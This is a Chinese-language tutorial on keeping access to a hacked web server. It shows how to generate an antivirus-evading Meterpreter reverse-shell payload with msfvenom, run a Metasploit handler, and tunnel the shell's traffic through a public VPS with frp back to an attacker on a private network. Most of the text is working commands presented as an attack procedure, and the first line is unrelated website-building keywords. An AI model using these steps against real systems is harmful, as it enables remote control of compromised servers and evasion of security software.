建网站销售常见问题,做学术论文的网站,洛阳网站建设设计公司哪家好,如何在网站后台做网页代理
代理使用场景
拿下远程web服务器webshell连接不稳定#xff0c;需要使用稳定的木马程序远程服务器无法直接连接攻击者电脑#xff08;内网IP#xff09;需要借助公网vps转发来自失陷服务器的木马流量借助frp服务器#xff08;vps#xff09;和客户端#xff08;内…代理
代理使用场景
拿下远程web服务器webshell连接不稳定需要使用稳定的木马程序远程服务器无法直接连接攻击者电脑内网IP需要借助公网vps转发来自失陷服务器的木马流量借助frp服务器vps和客户端内网攻击者建立隧道当vps某一个端口收到流量的时候frps会根据提前和frpc约定好的规则使用建立好的隧道转发流量
前提条件
攻击者
拿下了一台webshell权限需要上传完整功能的木马生成一个木马不管谁执行了这个木马都会连接vps的4444端口发送流量
代理过程 隧道
失陷主机或服务器
在执行攻击者上传的木马时主动与vps进行连接请求与vps的4444端口进行通信发送流量
公网vps
攻击者可控攻击者和受害服务器都可以访问vps使用7000端口frp软件进行监听攻击者向vps发出请求建立隧道只能由攻击者向vps发出请求因为公网IP不能访问私网IP失陷主机运行木马后失陷主机将信息通过4444端口传送至vpsvps把自己的4444端口的流量通过7000端口转发给攻击者
frp服务
frp存在客户端和服务端frp服务运行起来后服务端会自行开放7000端口。 内网kali用户上配置frpc客户端 vps7.7.7.7上配置frps服务端 frps和frpc做好链接后内网IP和vps7.7.7.7就建立了一个隧道 frp服务vps的4444端口会主动转发通过7000端口给客户端设定接收流量的端口
内网IP查看能否与外网通信 MSF木马生成
msfvenom -p windows/meterpreter/reverse_tcp LHOST10.9.75.223 LPORT4444 -e x86/shikata_ga_nai -f exe -o shell.exe -i 5解释
这是一个使用Metasploit框架中的msfvenom工具生成恶意软件的命令。
-p 指定Payload有效负载木马的功能点为Windows Meterpreter反向TCP连接。Meterpreter是Metasploit框架中一个功能强大的远程访问工具。LHOST设置本地监听IP地址为10.9.75.223。这是恶意软件将连接到的主机IP地址。LPORT设置本地监听端口号为4444。这是恶意软件将连接到的主机端口号。-e 使用x86/shikata_ga_nai编码来混淆Payload以避免被基于特征的防病毒软件检测。-f 设置生成的恶意软件文件格式为可执行文件exe。-o 指定生成的恶意软件文件名为shell.exe。-i 设置编码迭代次数为5以增加避免被检测的难度。
木马上传至失陷主机 监听
1、启动msf msfconsole
2、载入监控模块 use exploit/multi/handler
3、加载payload
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 4444
runkali主机启动监听等待木马连接
失陷主机运行木马后将流量数据包发送给vps的4444端口但是vps没有开放4444端口 vps开启frp服务
frp服务端 查看frp服务端的配置文件当启动frp服务端的时候默认开启7000端口和客户端连接。向客户端发流量数据包。 在frps.exe所在文件打开cmd
frps.exe -c frps.ini #启动frp服务器frp客户端
解压frp客户端压缩包
tar xf frp_0.33.0_linux_amd64.tar.gz进入frp_0.33.0_linux_amd64目录查看客户端配置信息
cd frp_0.33.0_linux_amd64
ls
sudo vim frpc.ini启动frp客户端frpc
sudo ./frpc -c frpc.ini #启动客户端运行木马
失陷主机运行木马 打开生成木马界面获得shell